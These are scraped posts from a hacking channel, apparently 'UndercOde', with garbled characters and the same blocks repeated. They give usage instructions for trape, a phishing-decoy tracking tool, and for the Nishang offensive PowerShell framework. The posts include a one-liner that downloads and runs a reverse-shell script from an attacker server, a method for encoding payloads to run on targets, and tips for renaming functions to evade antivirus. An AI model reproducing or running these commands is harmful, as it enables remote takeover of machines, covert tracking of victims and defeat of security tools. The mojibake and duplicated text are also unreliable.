--ngrok In this option you can enter a token, to run at the time of a process. This would replace the token saved in configurations.
--version You can see the version number of trape.
--update Option used to upgrade to the latest version of trape.
--help It is used to see all the above options, from the executable.
π¦Tested by UndercOde :
> rooted android 9.0
> ubuntu
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Updated > tracking location script :
Trape is an OSINT analysis and research tool, which allows people to track and execute intelligent social engineering attacks in real time. It was created with the aim of teaching the world how large Internet companies could obtain confidential information such as the status of sessions of their websites or services and control their users through their browser, without their knowlege, but It evolves with the aim of helping government organizations, companies and researchers to track the cybercriminals.
pinterest.com/Undercode_testing
π¦πβπππΈπππππΈπππβ & βπβ
1) git clone https://github.com/jofpin/trape.git
2) cd trape
3) python2 trape.py -h
If it does not work, try to install all the libraries that are located in the file requirements.txt
4) python2 -m pip install -r requirements.txt
π¦ Example of execution
5) Example: python2 trape.py --url http://example.com --port 8080
π¦ HELP AND OPTIONS
6) user:~$ python2 trape.py --help
usage: python trape.py -u <> -p <> [-h] [-v] [-u URL] [-p PORT]
[-ak ACCESSKEY] [-l LOCAL]
[--update] [-n] [-ic INJC]
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-u URL, --url URL Put the web page url to clone
-p PORT, --port PORT Insert your port
-ak ACCESSKEY, --accesskey ACCESSKEY
Insert your custom key access
-l LOCAL, --local LOCAL
Insert your home file
-n, --ngrok Insert your ngrok Authtoken
-ic INJC, --injectcode INJC
Insert your custom REST API path
-ud UPDATE, --update UPDATE
Update trape to the latest version
--url In this option you add the URL you want to clone, which works as a decoy.
--port Here you insert the port, where you are going to run the trape server.
--accesskey You enter a custom key for the trape panel, if you do not insert it will generate an automatic key.
--injectcode trape contains a REST API to play anywhere, using this option you can customize the name of the file to include, if it does not, generates a random name allusive to a token.
--local Using this option you can call a local HTML file, this is the replacement of the --url option made to run a local lure in trape.
--ngrok In this option you can enter a token, to run at the time of a process. This would replace the token saved in configurations.
--version You can see the version number of trape.
--update Option used to upgrade to the latest version of trape.
--help It is used to see all the above options, from the executable.
π¦Tested by UndercOde :
> rooted android 9.0
> ubuntu
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from PRIVATE UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Updated Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.
t.me/UndercOdeTesting
π¦πβπππΈπππππΈπππβ & βπβ
>clone on Windows https://github.com/samratashok/nishang
1) Import all the scripts in the current PowerShell session (PowerShell v3 onwards).
> PS C:\nishang> Import-Module .\nishang.psm1
Use the individual scripts with dot sourcing.
> PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1
> PS C:\nishang> Get-Information
2) To get help about any script or function, use:
> PS C:\nishang> Get-Help [scriptname] -full
> Note that the help is available for the function loaded after running the script and not the script itself since version 0.3.8. In all cases, the function name is same as the script name.
π¦ For example, to see the help about Get-WLAN-Keys.ps1, use
> PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1
> PS C:\nishang> Get-Help Get-WLAN-Keys -Full
π¦Disabling Anti Virus
1) this script scripts are flagged by many Anti Viruses as malicious. The scrripts on a target are meant to be used in memory which is very easy to do with PowerShell. Two basic methods to execute PowerShell scripts in memory:
> Method 1. Use the in-memory dowload and execute: Use below command to execute a PowerShell script from a remote shell, meterpreter native shell, a web shell etc. and the function exported by it. All the scripts in Nishang export a function with same name in the current PowerShell session.
2) powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]
> Method 2. Use the -encodedcommand (or -e) parameter of PowerShell All the scripts in Nishang export a function with same name in the current PowerShell session. Therefore, make sure the function call is made in the script itself while using encodedcommand parameter from a non-PowerShell shell. For above example, add a function call (without quotes) "Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]".
3) Encode the scrript using Invoke-Encode from Nishang:
PS C:\nishang> . \nishang\Utility\Invoke-Encode
PS C:\nishang> Invoke-Encode -DataToEncode C:\nishang\Shells\Invoke-PowerShellTcp.ps1 -OutCommand
Encoded data written to .\encoded.txt
4) Encoded command written to .\encodedcommand.txt
From above, use the encoded script from encodedcommand.txt and run it on a target where commands could be executed (a remote shell, meterpreter native shell, a web shell etc.). Use it like below:
C:\Users\target> powershell -e [encodedscript]
If the scripts still get detected changing the function and parameter names and removing the help content will help.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Updated Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.
t.me/UndercOdeTesting
π¦πβπππΈπππππΈπππβ & βπβ
>clone on Windows https://github.com/samratashok/nishang
1) Import all the scripts in the current PowerShell session (PowerShell v3 onwards).
> PS C:\nishang> Import-Module .\nishang.psm1
Use the individual scripts with dot sourcing.
> PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1
> PS C:\nishang> Get-Information
2) To get help about any script or function, use:
> PS C:\nishang> Get-Help [scriptname] -full
> Note that the help is available for the function loaded after running the script and not the script itself since version 0.3.8. In all cases, the function name is same as the script name.
π¦ For example, to see the help about Get-WLAN-Keys.ps1, use
> PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1
> PS C:\nishang> Get-Help Get-WLAN-Keys -Full
π¦Disabling Anti Virus
1) this script scripts are flagged by many Anti Viruses as malicious. The scrripts on a target are meant to be used in memory which is very easy to do with PowerShell. Two basic methods to execute PowerShell scripts in memory:
> Method 1. Use the in-memory dowload and execute: Use below command to execute a PowerShell script from a remote shell, meterpreter native shell, a web shell etc. and the function exported by it. All the scripts in Nishang export a function with same name in the current PowerShell session.
2) powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]
> Method 2. Use the -encodedcommand (or -e) parameter of PowerShell All the scripts in Nishang export a function with same name in the current PowerShell session. Therefore, make sure the function call is made in the script itself while using encodedcommand parameter from a non-PowerShell shell. For above example, add a function call (without quotes) "Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]".
3) Encode the scrript using Invoke-Encode from Nishang:
PS C:\nishang> . \nishang\Utility\Invoke-Encode
PS C:\nishang> Invoke-Encode -DataToEncode C:\nishang\Shells\Invoke-PowerShellTcp.ps1 -OutCommand
Encoded data written to .\encoded.txt
4) Encoded command written to .\encodedcommand.txt
From above, use the encoded script from encodedcommand.txt and run it on a target where commands could be executed (a remote shell, meterpreter native shell, a web shell etc.). Use it like below:
C:\Users\target> powershell -e [encodedscript]
If the scripts still get detected changing the function and parameter names and removing the help content will help.
written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β